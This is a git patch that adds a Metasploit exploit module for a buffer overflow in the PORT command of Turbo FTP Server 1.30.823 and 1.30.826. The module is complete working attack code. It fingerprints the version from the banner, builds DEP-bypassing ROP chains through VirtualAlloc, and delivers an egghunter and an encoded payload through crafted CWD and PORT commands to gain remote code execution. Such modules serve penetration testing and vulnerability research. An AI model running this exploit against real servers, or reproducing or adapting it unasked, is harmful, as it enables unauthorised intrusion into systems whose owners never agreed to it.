From c7d12d94b781da2f10070fd33c2528e48a123f88 Mon Sep 17 00:00:00 2001 From: "lincoln@corelan.be" Date: Fri, 19 Oct 2012 11:05:44 -0700 Subject: [PATCH] turboftp exploit --- modules/exploits/windows/ftp/turboftp_port.rb | 206 ++++++++++++++++++ 1 file changed, 206 insertions(+) create mode 100644 modules/exploits/windows/ftp/turboftp_port.rb diff --git a/modules/exploits/windows/ftp/turboftp_port.rb b/modules/exploits/windows/ftp/turboftp_port.rb new file mode 100644 index 0000000000..ad85f18473 --- /dev/null +++ b/modules/exploits/windows/ftp/turboftp_port.rb @@ -0,0 +1,206 @@ +## +# +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Ftp + include Msf::Exploit::Remote::Egghunter + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Turbo FTP Server 1.30.823 PORT Overflow', + 'Description' => %q{ + This module exploits the buffer overflow found in the PORT + command in Turbo FTP Server 1.30.823 & 1.30.826. + }, + 'Author' => [ + 'Zhao Liang', #Initial Descovery + 'Lincoln', #Metasploit + 'corelanc0d3r', #Metasploit + 'thelightcosine',#Metasploit + ], + 'License' => MSF_LICENSE, + 'Version' => '$', + 'Platform' => [ 'win' ], + 'References' => + [ + [ 'OSVDB', '85887' ], + ], + 'Payload' => + { + 'BadChars' => "\x00", + 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, + 'EncoderOptions' => + { + 'BufferRegister' => 'EDI', + } + + }, + 'Targets' => + [ + [ 'Automatic', {} ], + ['Windows Universal TurboFtp 1.30.823', + { + 'Ret' => 0x00411985, # RETN (ROP NOP) [tbssvc.exe] + 'ver' => 823 + }, + + ], + [ 'Windows Universal TurboFtp 1.30.826', + { + 'Ret' => 0x004fb207, # RETN (ROP NOP) [tbssvc.exe] + 'ver' => 826 + }, + ], + ], + + 'DisclosureDate' => 'Oct 03 2012', + 'DefaultTarget' => 0)) + end + + def check + connect + disconnect + if (banner =~ /1\.30\.823/) + return Exploit::CheckCode::Vulnerable + elsif (banner =~ /1\.30\.826/) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe + end + + + def create_rop_chain(ver) + + # rop chain generated with mona.py - www.corelan.be + if ver == 823 + rop_gadgets = + [ + 0x004b692a, # POP ECX # RETN [tbssvc.exe] + 0x005f6074, # ptr to &VirtualAlloc() [IAT tbssvc.exe] + 0x0046f82a, # MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe] + 0x00423b95, # XCHG EDX,EDI # RETN [tbssvc.exe] + 0x00423a27, # XCHG ESI,EDI # RETN [tbssvc.exe] + 0x005d1c99, # POP EBP # RETN [tbssvc.exe] + 0x004cad5d , # & jmp esp [tbssvc.exe] + 0x004ab16b, # POP EBX # RETN [tbssvc.exe] + 0x00000001, # 0x00000001-> ebx + 0x005ef7f6, # POP EDX # RETN [tbssvc.exe] + 0x00001000, # 0x00001000-> edx + 0x005d7139, # POP ECX # RETN [tbssvc.exe] + 0x00000040, # 0x00000040-> ecx + 0x004df1e0, # POP EDI # RETN [tbssvc.exe] + 0x00411985, # RETN (ROP NOP) [tbssvc.exe] + 0x00502639, # POP EAX # RETN [tbssvc.exe] + 0x90909090, # nop + 0x00468198, # PUSHAD # RETN [tbssvc.exe] + ].flatten.pack("V*") + + elsif ver == 826 + rop_gadgets = + [ + 0x0050eae4, # POP ECX # RETN [tbssvc.exe] + 0x005f7074, # ptr to &VirtualAlloc() [IAT tbssvc.exe] + 0x004aa7aa, # MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe] + 0x00496A65, # XOR EAX,EAX [tbssvc.exe] + 0x004badda, # ADD EAX,EDX # RETN [tbssvc.exe] + 0x00411867, # XCHG EAX,ESI # XOR EAX,EAX # POP EBX # RETN [tbssvc.exe] + 0x00000001, # 0x00000001-> ebx + 0x0058a27a, # POP EBP # RETN [tbssvc.exe] + 0x004df7dd, # & call esp [tbssvc.exe] + 0x005f07f6, # POP EDX # RETN [tbssvc.exe] + 0x00001000, # 0x00001000-> edx + 0x004adc08, # POP ECX # RETN [tbssvc.exe] + 0x00000040, # 0x00000040-> ecx + 0x00465fbe, # POP EDI # RETN [tbssvc.exe] + 0x004fb207, # RETN (ROP NOP) [tbssvc.exe] + 0x00465f36, # POP EAX # RETN [tbssvc.exe] + 0x90909090, # nop + 0x004687ff, # PUSHAD # RETN [tbssvc.exe] + ].flatten.pack("V*") + end + return rop_gadgets + + end + + def exploit + + my_target = target + if my_target.name == 'Automatic' + print_status("Automatically detecting the target") + connect + disconnect + + if (banner =~ /1\.30\.823/) + my_target = targets[1] + elsif (banner =~ /1\.30\.826/) + my_target = targets[2] + end + if (not my_target) + print_status("No matching target...quiting") + return + end + target = my_target + end + + print_status("Selected Target: #{my_target.name}") + connect_login + + rop_chain = create_rop_chain(target['ver']) + rop = rop_chain.unpack('C*').join(',') + + eggoptions = + { + :checksum => true, + :eggtag => 'w00t', + :depmethod => 'virtualalloc', + :depreg => 'esi' + } + badchars = "\x00" + hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions) + + speedupasm = "mov edx,eax\n" + speedupasm << "sub edx,0x1000\n" + speedupasm << "sub esp,0x1000" + speedup = Metasm::Shellcode.assemble(Metasm::Ia32.new, speedupasm).encode_string + + fasterhunter = speedup + fasterhunter << hunter + + print_status("Connecting to target #{target.name} server") + + buf1 = rand_text_alpha(2012) + buf1 << egg + buf1 << rand_text_alpha(100) + + buf2 = rand_text_alpha(4).unpack('C*').join(',') + buf2 << "," + buf2 << [target['Ret']].pack("V").unpack('C*').join(',') #eip + buf2 << "," + buf2 << rop + buf2 << "," + buf2 << fasterhunter.unpack('C*').join(',') + buf2 << "," + buf2 << rand_text_alpha(90).unpack('C*').join(',') + + send_cmd( ['CWD', buf1], true ); + send_cmd( ['PORT', buf2], true ); + + print_status("Egghunter deployed, locating shellcode") + + handler + disconnect + end + +end